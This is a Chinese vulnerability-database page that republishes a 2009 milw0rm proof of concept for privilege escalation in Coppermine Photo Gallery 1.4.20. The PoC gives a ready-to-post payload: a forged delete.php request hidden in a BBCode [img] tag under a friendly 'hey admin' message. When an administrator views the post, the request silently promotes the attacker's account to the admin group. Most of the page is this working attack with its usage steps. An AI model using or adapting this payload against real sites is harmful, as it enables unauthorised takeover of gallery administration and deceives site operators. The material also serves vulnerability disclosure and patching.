Coppermine Photo Gallery 1.4.20 - BBCode IMG Privilege Escalation

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057498 漏洞类型
发布时间 2009-02-26 更新时间 2009-02-26
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/8114
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
+--------------------------------------------------------------------------+
| Coppermine Photo Gallery <= 1.4.20 (BBCode IMG) Privilege Escalation PoC |
+--------------------------------------------------------------------------+
| by Juri Gianni aka yeat - staker[at]hotmail[dot]it                       |
| http://coppermine-gallery.net                                            |
| Don't add me on msn messenger.                                           |
| This vulnerability can be named as "bbcode img tag script injection"     |
+--------------------------------------------------------------------------+
| Proof of Concept  (an example,to understand it)                          |
+--------------------------------------------------------------------------+
 URL: http://[host]/[path]/delete.php?id=u[ID]&u[ID]=&action=change_group&what=user&new_password=&group=1&delete_files=no&delete_comments=no
 [img]URL[/img]                                                           
+--------------------------------------------------------------------------+
| Modify [ID] with your user id.                                           |
| Go http://[host]/[path]/displayimage.php?album=random&pos=[album id]     |
+--------------------------------------------------------------------------+
 Insert the below code into a new message
 
 hey admin,nice web site :)
 [img]http://[host]/[path]/delete.php?id=u3&u3=&action=change_group&what=user&new_password=&group=1&delete_files=no&delete_comments=no[/img]
 
+-------------------------------------------------------------------------+
| The fake image doesn't show errors,you'll see "hey admin,nice web site" |
| You'll become admin when the real admin will visit the page             |          
+-------------------------------------------------------------------------+

# milw0rm.com [2009-02-26]